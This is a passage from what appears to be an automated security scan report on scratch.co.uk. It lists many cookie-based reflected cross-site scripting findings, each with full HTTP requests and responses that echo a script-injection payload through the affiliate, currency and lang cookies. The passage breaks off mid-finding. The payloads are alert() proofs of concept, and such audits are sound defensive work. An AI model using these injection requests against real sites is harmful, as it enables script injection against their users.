Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGa2c6e"><script>alert(1)</script>f553ccebbf; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENGa2c6e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef553ccebbf; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGa2c6e"><script>alert(1)</script>f553ccebbf', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/fairplay/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71b4"><script>alert(1)</script>7d02a9a5dda was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4"><script>alert(1)</script>7d02a9a5dda; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c71b4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7d02a9a5dda; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c71b4"><script>alert(1)</script>7d02a9a5dda');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/fairplay/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8329"><script>alert(1)</script>563c2da48f5 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd8329"><script>alert(1)</script>563c2da48f5;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: currency=GBPd8329%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E563c2da48f5; expires=Wed, 15-Jun-2011 12:30:10 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd8329"><script>alert(1)</script>563c2da48f5', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/fairplay/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29be1"><script>alert(1)</script>140ac1fb98e was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG29be1"><script>alert(1)</script>140ac1fb98e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: lang=ENG29be1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E140ac1fb98e; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:24 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG29be1"><script>alert(1)</script>140ac1fb98e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/privacy/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a13"><script>alert(1)</script>461aa39c4c8 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24334a13"><script>alert(1)</script>461aa39c4c8; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24334a13%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E461aa39c4c8; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:57 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:57 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24334a13"><script>alert(1)</script>461aa39c4c8');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.170. http://scratch.co.uk/help/privacy/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/privacy/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff73f"><script>alert(1)</script>74d5790b1ac was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPff73f"><script>alert(1)</script>74d5790b1ac;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: currency=GBPff73f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74d5790b1ac; expires=Wed, 15-Jun-2011 12:30:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 17101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPff73f"><script>alert(1)</script>74d5790b1ac', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.171. http://scratch.co.uk/help/privacy/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/privacy/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88308"><script>alert(1)</script>3161139aaf8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG88308"><script>alert(1)</script>3161139aaf8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: lang=ENG88308%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3161139aaf8; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG88308"><script>alert(1)</script>3161139aaf8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/invite-friend/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef2"><script>alert(1)</script>2ddcfdeb17b was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2"><script>alert(1)</script>2ddcfdeb17b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ddcfdeb17b; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2437cef2"><script>alert(1)</script>2ddcfdeb17b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.173. http://scratch.co.uk/invite-friend/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/invite-friend/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b24"><script>alert(1)</script>331cb5603ba was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd0b24"><script>alert(1)</script>331cb5603ba;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: currency=GBPd0b24%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E331cb5603ba; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd0b24"><script>alert(1)</script>331cb5603ba', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.174. http://scratch.co.uk/invite-friend/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/invite-friend/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61860"><script>alert(1)</script>93ea94dc415 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG61860"><script>alert(1)</script>93ea94dc415; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: lang=ENG61860%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E93ea94dc415; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:28:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG61860"><script>alert(1)</script>93ea94dc415', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.175. http://scratch.co.uk/over-18/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/over-18/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94275"><script>alert(1)</script>11d8ef5060b was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394275"><script>alert(1)</script>11d8ef5060b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394275%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11d8ef5060b; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394275"><script>alert(1)</script>11d8ef5060b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.176. http://scratch.co.uk/over-18/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/over-18/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a5e9"><script>alert(1)</script>657c0e10aea was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
